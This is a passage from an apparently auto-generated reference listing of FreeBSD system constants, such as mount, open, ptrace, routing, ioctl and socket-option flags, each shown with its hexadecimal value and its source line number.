0x10000000 constant MNT_NOCLUSTERR (line 1078) | MNT_NOCLUSTERR = 0x40000000 constant MNT_NOCLUSTERW (line 1079) | MNT_NOCLUSTERW = 0x80000000 constant MNT_NOEXEC (line 1080) | MNT_NOEXEC = 0x4 constant MNT_NONBUSY (line 1081) | MNT_NONBUSY = 0x4000000 constant MNT_NOSUID (line 1082) | MNT_NOSUID = 0x8 constant MNT_NOSYMFOLLOW (line 1083) | MNT_NOSYMFOLLOW = 0x400000 constant MNT_NOWAIT (line 1084) | MNT_NOWAIT = 0x2 constant MNT_QUOTA (line 1085) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1086) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1087) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1088) | MNT_ROOTFS = 0x4000 constant MNT_SNAPSHOT (line 1089) | MNT_SNAPSHOT = 0x1000000 constant MNT_SOFTDEP (line 1090) | MNT_SOFTDEP = 0x200000 constant MNT_SUIDDIR (line 1091) | MNT_SUIDDIR = 0x100000 constant MNT_SUJ (line 1092) | MNT_SUJ = 0x100000000 constant MNT_SUSPEND (line 1093) | MNT_SUSPEND = 0x4 constant MNT_SYNCHRONOUS (line 1094) | MNT_SYNCHRONOUS = 0x2 constant MNT_UNION (line 1095) | MNT_UNION = 0x20 constant MNT_UNTRUSTED (line 1096) | MNT_UNTRUSTED = 0x800000000 constant MNT_UPDATE (line 1097) | MNT_UPDATE = 0x10000 constant MNT_UPDATEMASK (line 1098) | MNT_UPDATEMASK = 0xad8d0807e constant MNT_USER (line 1099) | MNT_USER = 0x8000 constant MNT_VERIFIED (line 1100) | MNT_VERIFIED = 0x400000000 constant MNT_VISFLAGMASK (line 1101) | MNT_VISFLAGMASK = 0xffef0ffff constant MNT_WAIT (line 1102) | MNT_WAIT = 0x1 constant MSG_CMSG_CLOEXEC (line 1103) | MSG_CMSG_CLOEXEC = 0x40000 constant MSG_COMPAT (line 1104) | MSG_COMPAT = 0x8000 constant MSG_CTRUNC (line 1105) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1106) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1107) | MSG_DONTWAIT = 0x80 constant MSG_EOF (line 1108) | MSG_EOF = 0x100 constant MSG_EOR (line 1109) | MSG_EOR = 0x8 constant MSG_NBIO (line 1110) | MSG_NBIO = 0x4000 constant MSG_NOSIGNAL (line 1111) | MSG_NOSIGNAL = 0x20000 constant MSG_NOTIFICATION (line 1112) | MSG_NOTIFICATION = 0x2000 constant MSG_OOB (line 1113) | MSG_OOB = 0x1 constant MSG_PEEK (line 1114) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1115) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1116) | MSG_WAITALL = 0x40 constant MSG_WAITFORONE (line 1117) | MSG_WAITFORONE = 0x80000 constant MS_ASYNC (line 1118) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1119) | MS_INVALIDATE = 0x2 constant MS_SYNC (line 1120) | MS_SYNC = 0x0 constant NAME_MAX (line 1121) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1122) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1123) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1124) | NET_RT_IFLIST = 0x3 constant NET_RT_IFLISTL (line 1125) | NET_RT_IFLISTL = 0x5 constant NET_RT_IFMALIST (line 1126) | NET_RT_IFMALIST = 0x4 constant NFDBITS (line 1127) | NFDBITS = 0x20 constant NOFLSH (line 1128) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1129) | NOKERNINFO = 0x2000000 constant NOTE_ABSTIME (line 1130) | NOTE_ABSTIME = 0x10 constant NOTE_ATTRIB (line 1131) | NOTE_ATTRIB = 0x8 constant NOTE_CHILD (line 1132) | NOTE_CHILD = 0x4 constant NOTE_CLOSE (line 1133) | NOTE_CLOSE = 0x100 constant NOTE_CLOSE_WRITE (line 1134) | NOTE_CLOSE_WRITE = 0x200 constant NOTE_DELETE (line 1135) | NOTE_DELETE = 0x1 constant NOTE_EXEC (line 1136) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1137) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1138) | NOTE_EXTEND = 0x4 constant NOTE_FFAND (line 1139) | NOTE_FFAND = 0x40000000 constant NOTE_FFCOPY (line 1140) | NOTE_FFCOPY = 0xc0000000 constant NOTE_FFCTRLMASK (line 1141) | NOTE_FFCTRLMASK = 0xc0000000 constant NOTE_FFLAGSMASK (line 1142) | NOTE_FFLAGSMASK = 0xffffff constant NOTE_FFNOP (line 1143) | NOTE_FFNOP = 0x0 constant NOTE_FFOR (line 1144) | NOTE_FFOR = 0x80000000 constant NOTE_FILE_POLL (line 1145) | NOTE_FILE_POLL = 0x2 constant NOTE_FORK (line 1146) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1147) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1148) | NOTE_LOWAT = 0x1 constant NOTE_MSECONDS (line 1149) | NOTE_MSECONDS = 0x2 constant NOTE_NSECONDS (line 1150) | NOTE_NSECONDS = 0x8 constant NOTE_OPEN (line 1151) | NOTE_OPEN = 0x80 constant NOTE_PCTRLMASK (line 1152) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1153) | NOTE_PDATAMASK = 0xfffff constant NOTE_READ (line 1154) | NOTE_READ = 0x400 constant NOTE_RENAME (line 1155) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1156) | NOTE_REVOKE = 0x40 constant NOTE_SECONDS (line 1157) | NOTE_SECONDS = 0x1 constant NOTE_TRACK (line 1158) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1159) | NOTE_TRACKERR = 0x2 constant NOTE_TRIGGER (line 1160) | NOTE_TRIGGER = 0x1000000 constant NOTE_USECONDS (line 1161) | NOTE_USECONDS = 0x4 constant NOTE_WRITE (line 1162) | NOTE_WRITE = 0x2 constant OCRNL (line 1163) | OCRNL = 0x10 constant ONLCR (line 1164) | ONLCR = 0x2 constant ONLRET (line 1165) | ONLRET = 0x40 constant ONOCR (line 1166) | ONOCR = 0x20 constant ONOEOT (line 1167) | ONOEOT = 0x8 constant OPOST (line 1168) | OPOST = 0x1 constant OXTABS (line 1169) | OXTABS = 0x4 constant O_ACCMODE (line 1170) | O_ACCMODE = 0x3 constant O_APPEND (line 1171) | O_APPEND = 0x8 constant O_ASYNC (line 1172) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1173) | O_CLOEXEC = 0x100000 constant O_CREAT (line 1174) | O_CREAT = 0x200 constant O_DIRECT (line 1175) | O_DIRECT = 0x10000 constant O_DIRECTORY (line 1176) | O_DIRECTORY = 0x20000 constant O_EXCL (line 1177) | O_EXCL = 0x800 constant O_EXEC (line 1178) | O_EXEC = 0x40000 constant O_EXLOCK (line 1179) | O_EXLOCK = 0x20 constant O_FSYNC (line 1180) | O_FSYNC = 0x80 constant O_NDELAY (line 1181) | O_NDELAY = 0x4 constant O_NOCTTY (line 1182) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1183) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1184) | O_NONBLOCK = 0x4 constant O_RDONLY (line 1185) | O_RDONLY = 0x0 constant O_RDWR (line 1186) | O_RDWR = 0x2 constant O_RESOLVE_BENEATH (line 1187) | O_RESOLVE_BENEATH = 0x800000 constant O_SEARCH (line 1188) | O_SEARCH = 0x40000 constant O_SHLOCK (line 1189) | O_SHLOCK = 0x10 constant O_SYNC (line 1190) | O_SYNC = 0x80 constant O_TRUNC (line 1191) | O_TRUNC = 0x400 constant O_TTY_INIT (line 1192) | O_TTY_INIT = 0x80000 constant O_VERIFY (line 1193) | O_VERIFY = 0x200000 constant O_WRONLY (line 1194) | O_WRONLY = 0x1 constant PARENB (line 1195) | PARENB = 0x1000 constant PARMRK (line 1196) | PARMRK = 0x8 constant PARODD (line 1197) | PARODD = 0x2000 constant PENDIN (line 1198) | PENDIN = 0x20000000 constant PIOD_READ_D (line 1199) | PIOD_READ_D = 0x1 constant PIOD_READ_I (line 1200) | PIOD_READ_I = 0x3 constant PIOD_WRITE_D (line 1201) | PIOD_WRITE_D = 0x2 constant PIOD_WRITE_I (line 1202) | PIOD_WRITE_I = 0x4 constant PRIO_PGRP (line 1203) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1204) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1205) | PRIO_USER = 0x2 constant PROT_EXEC (line 1206) | PROT_EXEC = 0x4 constant PROT_NONE (line 1207) | PROT_NONE = 0x0 constant PROT_READ (line 1208) | PROT_READ = 0x1 constant PROT_WRITE (line 1209) | PROT_WRITE = 0x2 constant PTRACE_DEFAULT (line 1210) | PTRACE_DEFAULT = 0x1 constant PTRACE_EXEC (line 1211) | PTRACE_EXEC = 0x1 constant PTRACE_FORK (line 1212) | PTRACE_FORK = 0x8 constant PTRACE_LWP (line 1213) | PTRACE_LWP = 0x10 constant PTRACE_SCE (line 1214) | PTRACE_SCE = 0x2 constant PTRACE_SCX (line 1215) | PTRACE_SCX = 0x4 constant PTRACE_SYSCALL (line 1216) | PTRACE_SYSCALL = 0x6 constant PTRACE_VFORK (line 1217) | PTRACE_VFORK = 0x20 constant PT_ATTACH (line 1218) | PT_ATTACH = 0xa constant PT_CLEARSTEP (line 1219) | PT_CLEARSTEP = 0x10 constant PT_CONTINUE (line 1220) | PT_CONTINUE = 0x7 constant PT_DETACH (line 1221) | PT_DETACH = 0xb constant PT_FIRSTMACH (line 1222) | PT_FIRSTMACH = 0x40 constant PT_FOLLOW_FORK (line 1223) | PT_FOLLOW_FORK = 0x17 constant PT_GETDBREGS (line 1224) | PT_GETDBREGS = 0x25 constant PT_GETFPREGS (line 1225) | PT_GETFPREGS = 0x23 constant PT_GETLWPLIST (line 1226) | PT_GETLWPLIST = 0xf constant PT_GETNUMLWPS (line 1227) | PT_GETNUMLWPS = 0xe constant PT_GETREGS (line 1228) | PT_GETREGS = 0x21 constant PT_GETVFPREGS (line 1229) | PT_GETVFPREGS = 0x40 constant PT_GET_EVENT_MASK (line 1230) | PT_GET_EVENT_MASK = 0x19 constant PT_GET_SC_ARGS (line 1231) | PT_GET_SC_ARGS = 0x1b constant PT_GET_SC_RET (line 1232) | PT_GET_SC_RET = 0x1c constant PT_IO (line 1233) | PT_IO = 0xc constant PT_KILL (line 1234) | PT_KILL = 0x8 constant PT_LWPINFO (line 1235) | PT_LWPINFO = 0xd constant PT_LWP_EVENTS (line 1236) | PT_LWP_EVENTS = 0x18 constant PT_READ_D (line 1237) | PT_READ_D = 0x2 constant PT_READ_I (line 1238) | PT_READ_I = 0x1 constant PT_RESUME (line 1239) | PT_RESUME = 0x13 constant PT_SETDBREGS (line 1240) | PT_SETDBREGS = 0x26 constant PT_SETFPREGS (line 1241) | PT_SETFPREGS = 0x24 constant PT_SETREGS (line 1242) | PT_SETREGS = 0x22 constant PT_SETSTEP (line 1243) | PT_SETSTEP = 0x11 constant PT_SETVFPREGS (line 1244) | PT_SETVFPREGS = 0x41 constant PT_SET_EVENT_MASK (line 1245) | PT_SET_EVENT_MASK = 0x1a constant PT_STEP (line 1246) | PT_STEP = 0x9 constant PT_SUSPEND (line 1247) | PT_SUSPEND = 0x12 constant PT_SYSCALL (line 1248) | PT_SYSCALL = 0x16 constant PT_TO_SCE (line 1249) | PT_TO_SCE = 0x14 constant PT_TO_SCX (line 1250) | PT_TO_SCX = 0x15 constant PT_TRACE_ME (line 1251) | PT_TRACE_ME = 0x0 constant PT_VM_ENTRY (line 1252) | PT_VM_ENTRY = 0x29 constant PT_VM_TIMESTAMP (line 1253) | PT_VM_TIMESTAMP = 0x28 constant PT_WRITE_D (line 1254) | PT_WRITE_D = 0x5 constant PT_WRITE_I (line 1255) | PT_WRITE_I = 0x4 constant P_ZONEID (line 1256) | P_ZONEID = 0xc constant RLIMIT_AS (line 1257) | RLIMIT_AS = 0xa constant RLIMIT_CORE (line 1258) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1259) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1260) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1261) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1262) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1263) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1264) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1265) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1266) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1267) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1268) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 1269) | RTAX_BRD = 0x7 constant RTAX_DST (line 1270) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1271) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1272) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1273) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1274) | RTAX_IFP = 0x4 constant RTAX_MAX (line 1275) | RTAX_MAX = 0x8 constant RTAX_NETMASK (line 1276) | RTAX_NETMASK = 0x2 constant RTA_AUTHOR (line 1277) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 1278) | RTA_BRD = 0x80 constant RTA_DST (line 1279) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1280) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1281) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1282) | RTA_IFA = 0x20 constant RTA_IFP (line 1283) | RTA_IFP = 0x10 constant RTA_NETMASK (line 1284) | RTA_NETMASK = 0x4 constant RTF_BLACKHOLE (line 1285) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1286) | RTF_BROADCAST = 0x400000 constant RTF_DONE (line 1287) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1288) | RTF_DYNAMIC = 0x10 constant RTF_FIXEDMTU (line 1289) | RTF_FIXEDMTU = 0x80000 constant RTF_FMASK (line 1290) | RTF_FMASK = 0x1004d808 constant RTF_GATEWAY (line 1291) | RTF_GATEWAY = 0x2 constant RTF_GWFLAG_COMPAT (line 1292) | RTF_GWFLAG_COMPAT = 0x80000000 constant RTF_HOST (line 1293) | RTF_HOST = 0x4 constant RTF_LLDATA (line 1294) | RTF_LLDATA = 0x400 constant RTF_LLINFO (line 1295) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1296) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1297) | RTF_MODIFIED = 0x20 constant RTF_MULTICAST (line 1298) | RTF_MULTICAST = 0x800000 constant RTF_PINNED (line 1299) | RTF_PINNED = 0x100000 constant RTF_PROTO1 (line 1300) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1301) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1302) | RTF_PROTO3 = 0x40000 constant RTF_REJECT (line 1303) | RTF_REJECT = 0x8 constant RTF_RNH_LOCKED (line 1304) | RTF_RNH_LOCKED = 0x40000000 constant RTF_STATIC (line 1305) | RTF_STATIC = 0x800 constant RTF_STICKY (line 1306) | RTF_STICKY = 0x10000000 constant RTF_UP (line 1307) | RTF_UP = 0x1 constant RTF_XRESOLVE (line 1308) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 1309) | RTM_ADD = 0x1 constant RTM_CHANGE (line 1310) | RTM_CHANGE = 0x3 constant RTM_DELADDR (line 1311) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1312) | RTM_DELETE = 0x2 constant RTM_DELMADDR (line 1313) | RTM_DELMADDR = 0x10 constant RTM_GET (line 1314) | RTM_GET = 0x4 constant RTM_IEEE80211 (line 1315) | RTM_IEEE80211 = 0x12 constant RTM_IFANNOUNCE (line 1316) | RTM_IFANNOUNCE = 0x11 constant RTM_IFINFO (line 1317) | RTM_IFINFO = 0xe constant RTM_LOCK (line 1318) | RTM_LOCK = 0x8 constant RTM_LOSING (line 1319) | RTM_LOSING = 0x5 constant RTM_MISS (line 1320) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1321) | RTM_NEWADDR = 0xc constant RTM_NEWMADDR (line 1322) | RTM_NEWMADDR = 0xf constant RTM_REDIRECT (line 1323) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1324) | RTM_RESOLVE = 0xb constant RTM_RTTUNIT (line 1325) | RTM_RTTUNIT = 0xf4240 constant RTM_VERSION (line 1326) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1327) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1328) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1329) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1330) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1331) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1332) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1333) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1334) | RTV_SSTHRESH = 0x20 constant RTV_WEIGHT (line 1335) | RTV_WEIGHT = 0x100 constant RT_ALL_FIBS (line 1336) | RT_ALL_FIBS = -0x1 constant RT_BLACKHOLE (line 1337) | RT_BLACKHOLE = 0x40 constant RT_DEFAULT_FIB (line 1338) | RT_DEFAULT_FIB = 0x0 constant RT_HAS_GW (line 1339) | RT_HAS_GW = 0x80 constant RT_HAS_HEADER (line 1340) | RT_HAS_HEADER = 0x10 constant RT_HAS_HEADER_BIT (line 1341) | RT_HAS_HEADER_BIT = 0x4 constant RT_L2_ME (line 1342) | RT_L2_ME = 0x4 constant RT_L2_ME_BIT (line 1343) | RT_L2_ME_BIT = 0x2 constant RT_LLE_CACHE (line 1344) | RT_LLE_CACHE = 0x100 constant RT_MAY_LOOP (line 1345) | RT_MAY_LOOP = 0x8 constant RT_MAY_LOOP_BIT (line 1346) | RT_MAY_LOOP_BIT = 0x3 constant RT_REJECT (line 1347) | RT_REJECT = 0x20 constant RUSAGE_CHILDREN (line 1348) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1349) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 1350) | RUSAGE_THREAD = 0x1 constant SCM_BINTIME (line 1351) | SCM_BINTIME = 0x4 constant SCM_CREDS (line 1352) | SCM_CREDS = 0x3 constant SCM_MONOTONIC (line 1353) | SCM_MONOTONIC = 0x6 constant SCM_REALTIME (line 1354) | SCM_REALTIME = 0x5 constant SCM_RIGHTS (line 1355) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1356) | SCM_TIMESTAMP = 0x2 constant SCM_TIME_INFO (line 1357) | SCM_TIME_INFO = 0x7 constant SEEK_CUR (line 1358) | SEEK_CUR = 0x1 constant SEEK_DATA (line 1359) | SEEK_DATA = 0x3 constant SEEK_END (line 1360) | SEEK_END = 0x2 constant SEEK_HOLE (line 1361) | SEEK_HOLE = 0x4 constant SEEK_SET (line 1362) | SEEK_SET = 0x0 constant SHUT_RD (line 1363) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1364) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1365) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1366) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1367) | SIOCAIFADDR = 0x8040691a constant SIOCAIFGROUP (line 1368) | SIOCAIFGROUP = 0x80246987 constant SIOCATMARK (line 1369) | SIOCATMARK = 0x40047307 constant SIOCDELMULTI (line 1370) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1371) | SIOCDIFADDR = 0x80206919 constant SIOCDIFGROUP (line 1372) | SIOCDIFGROUP = 0x80246989 constant SIOCDIFPHYADDR (line 1373) | SIOCDIFPHYADDR = 0x80206949 constant SIOCGDRVSPEC (line 1374) | SIOCGDRVSPEC = 0xc01c697b constant SIOCGETSGCNT (line 1375) | SIOCGETSGCNT = 0xc0147210 constant SIOCGETVIFCNT (line 1376) | SIOCGETVIFCNT = 0xc014720f constant SIOCGHIWAT (line 1377) | SIOCGHIWAT = 0x40047301 constant SIOCGHWADDR (line 1378) | SIOCGHWADDR = 0xc020693e constant SIOCGI2C (line 1379) | SIOCGI2C = 0xc020693d constant SIOCGIFADDR (line 1380) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFALIAS (line 1381) | SIOCGIFALIAS = 0xc044692d constant SIOCGIFBRDADDR (line 1382) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCAP (line 1383) | SIOCGIFCAP = 0xc020691f constant SIOCGIFCONF (line 1384) | SIOCGIFCONF = 0xc0086924 constant SIOCGIFDESCR (line 1385) | SIOCGIFDESCR = 0xc020692a constant SIOCGIFDOWNREASON (line 1386) | SIOCGIFDOWNREASON = 0xc058699a constant SIOCGIFDSTADDR (line 1387) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFIB (line 1388) | SIOCGIFFIB = 0xc020695c constant SIOCGIFFLAGS (line 1389) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFGENERIC (line 1390) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFGMEMB (line 1391) | SIOCGIFGMEMB = 0xc024698a constant SIOCGIFGROUP (line 1392) | SIOCGIFGROUP = 0xc0246988 constant SIOCGIFINDEX (line 1393) | SIOCGIFINDEX = 0xc0206920 constant SIOCGIFMAC (line 1394) | SIOCGIFMAC = 0xc0206926 constant SIOCGIFMEDIA (line 1395) | SIOCGIFMEDIA = 0xc0286938 constant SIOCGIFMETRIC (line 1396) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1397) | SIOCGIFMTU = 0xc0206933 constant SIOCGIFNETMASK (line 1398) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPDSTADDR (line 1399) | SIOCGIFPDSTADDR = 0xc0206948 constant SIOCGIFPHYS (line 1400) | SIOCGIFPHYS = 0xc0206935 constant SIOCGIFPSRCADDR (line 1401) | SIOCGIFPSRCADDR = 0xc0206947 constant SIOCGIFRSSHASH (line 1402) | SIOCGIFRSSHASH = 0xc0186997 constant SIOCGIFRSSKEY (line 1403) | SIOCGIFRSSKEY = 0xc0946996 constant SIOCGIFSTATUS (line 1404) | SIOCGIFSTATUS = 0xc331693b constant SIOCGIFXMEDIA (line 1405) | SIOCGIFXMEDIA = 0xc028698b constant SIOCGLANPCP (line 1406) | SIOCGLANPCP = 0xc0206998 constant SIOCGLOWAT (line 1407) | SIOCGLOWAT = 0x40047303 constant SIOCGPGRP (line 1408) | SIOCGPGRP = 0x40047309 constant SIOCGPRIVATE_0 (line 1409) | SIOCGPRIVATE_0 = 0xc0206950 constant SIOCGPRIVATE_1 (line 1410) | SIOCGPRIVATE_1 = 0xc0206951 constant SIOCGTUNFIB (line 1411) | SIOCGTUNFIB = 0xc020695e constant SIOCIFCREATE (line 1412) | SIOCIFCREATE = 0xc020697a constant SIOCIFCREATE2 (line 1413) | SIOCIFCREATE2 = 0xc020697c constant SIOCIFDESTROY (line 1414) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1415) | SIOCIFGCLONERS = 0xc00c6978 constant SIOCSDRVSPEC (line 1416) | SIOCSDRVSPEC = 0x801c697b constant SIOCSHIWAT (line 1417) | SIOCSHIWAT = 0x80047300 constant SIOCSIFADDR (line 1418) | SIOCSIFADDR = 0x8020690c constant SIOCSIFBRDADDR (line 1419) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFCAP (line 1420) | SIOCSIFCAP = 0x8020691e constant SIOCSIFDESCR (line 1421) | SIOCSIFDESCR = 0x80206929 constant SIOCSIFDSTADDR (line 1422) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFIB (line 1423) | SIOCSIFFIB = 0x8020695d constant SIOCSIFFLAGS (line 1424) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGENERIC (line 1425) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFLLADDR (line 1426) | SIOCSIFLLADDR = 0x8020693c constant SIOCSIFMAC (line 1427) | SIOCSIFMAC = 0x80206927 constant SIOCSIFMEDIA (line 1428) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1429) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1430) | SIOCSIFMTU = 0x80206934 constant SIOCSIFNAME (line 1431) | SIOCSIFNAME = 0x80206928 constant SIOCSIFNETMASK (line 1432) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPHYADDR (line 1433) | SIOCSIFPHYADDR = 0x80406946 constant SIOCSIFPHYS (line 1434) | SIOCSIFPHYS = 0x80206936 constant SIOCSIFRVNET (line 1435) | SIOCSIFRVNET = 0xc020695b constant SIOCSIFVNET (line 1436) | SIOCSIFVNET = 0xc020695a constant SIOCSLANPCP (line 1437) | SIOCSLANPCP = 0x80206999 constant SIOCSLOWAT (line 1438) | SIOCSLOWAT = 0x80047302 constant SIOCSPGRP (line 1439) | SIOCSPGRP = 0x80047308 constant SIOCSTUNFIB (line 1440) | SIOCSTUNFIB = 0x8020695f constant SOCK_CLOEXEC (line 1441) | SOCK_CLOEXEC = 0x10000000 constant SOCK_DGRAM (line 1442) | SOCK_DGRAM = 0x2 constant SOCK_MAXADDRLEN (line 1443) | SOCK_MAXADDRLEN = 0xff constant SOCK_NONBLOCK (line 1444) | SOCK_NONBLOCK = 0x20000000 constant SOCK_RAW (line 1445) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1446) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1447) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1448) | SOCK_STREAM = 0x1 constant SOL_LOCAL (line 1449) | SOL_LOCAL = 0x0 constant SOL_SOCKET (line 1450) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1451) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1452) | SO_ACCEPTCONN = 0x2 constant SO_ACCEPTFILTER (line 1453) | SO_ACCEPTFILTER = 0x1000 constant SO_BINTIME (line 1454) | SO_BINTIME = 0x2000 constant SO_BROADCAST (line 1455) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1456) | SO_DEBUG = 0x1 constant SO_DOMAIN (line 1457) | SO_DOMAIN = 0x1019 constant SO_DONTROUTE (line 1458) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1459) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1460) | SO_KEEPALIVE = 0x8 constant SO_LABEL (line 1461) | SO_LABEL = 0x1009 constant SO_LINGER (line 1462) | SO_LINGER = 0x80 constant SO_LISTENINCQLEN (line 1463) | SO_LISTENINCQLEN = 0x1013 constant SO_LISTENQLEN (line 1464) | SO_LISTENQLEN = 0x1012 constant SO_LISTENQLIMIT (line 1465) | SO_LISTENQLIMIT = 0x1011 constant SO_MAX_PACING_RATE (line 1466) | SO_MAX_PACING_RATE = 0x1018 constant SO_NOSIGPIPE (line 1467) | SO_NOSIGPIPE = 0x800 constant SO_NO_DDP (line 1468) | SO_NO_DDP = 0x8000 constant SO_NO_OFFLOAD (line 1469) | SO_NO_OFFLOAD = 0x4000 constant SO_OOBINLINE (line 1470) | SO_OOBINLINE = 0x100 constant SO_PEERLABEL (line 1471) | SO_PEERLABEL = 0x1010 constant SO_PROTOCOL (line 1472) | SO_PROTOCOL = 0x1016 constant SO_PROTOTYPE (line 1473) | SO_PROTOTYPE = 0x1016 constant SO_RCVBUF (line 1474) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1475) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1476) | SO_RCVTIMEO = 0x1006 constant SO_RERROR (line 1477) | SO_RERROR = 0x20000 constant SO_REUSEADDR (line 1478) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1479) | SO_REUSEPORT = 0x200 constant SO_REUSEPORT_LB (line 1480) | SO_REUSEPORT_LB = 0x10000 constant SO_SETFIB (line 1481) | SO_SETFIB = 0x1014 constant SO_SNDBUF (line 1482) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1483) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1484) | SO_SNDTIMEO = 0x1005 constant SO_TIMESTAMP (line 1485) | SO_TIMESTAMP = 0x400 constant SO_TS_BINTIME (line 1486) | SO_TS_BINTIME = 0x1 constant SO_TS_CLOCK (line 1487) | SO_TS_CLOCK = 0x1017 constant SO_TS_CLOCK_MAX (line 1488) | SO_TS_CLOCK_MAX = 0x3 constant SO_TS_DEFAULT (line 1489) | SO_TS_DEFAULT = 0x0 constant SO_TS_MONOTONIC (line 1490) | SO_TS_MONOTONIC = 0x3 constant SO_TS_REALTIME (line 1491) | SO_TS_REALTIME = 0x2 constant SO_TS_REALTIME_MICRO (line 1492) | SO_TS_REALTIME_MICRO = 0x0 constant SO_TYPE (line 1493) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1494) | SO_USELOOPBACK = 0x40 constant SO_USER_COOKIE (line 1495) | SO_USER_COOKIE = 0x1015 constant SO_VENDOR (line 1496) | SO_VENDOR = 0x80000000 constant S_BLKSIZE (line 1497) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1498) | S_IEXEC = 0x40 constant S_IFBLK (line 1499) | S_IFBLK = 0x6000 constant S_IFCHR (line 1500) | S_IFCHR = 0x2000 constant S_IFDIR (line 1501) | S_IFDIR = 0x4000 constant S_IFIFO (line 1502) | 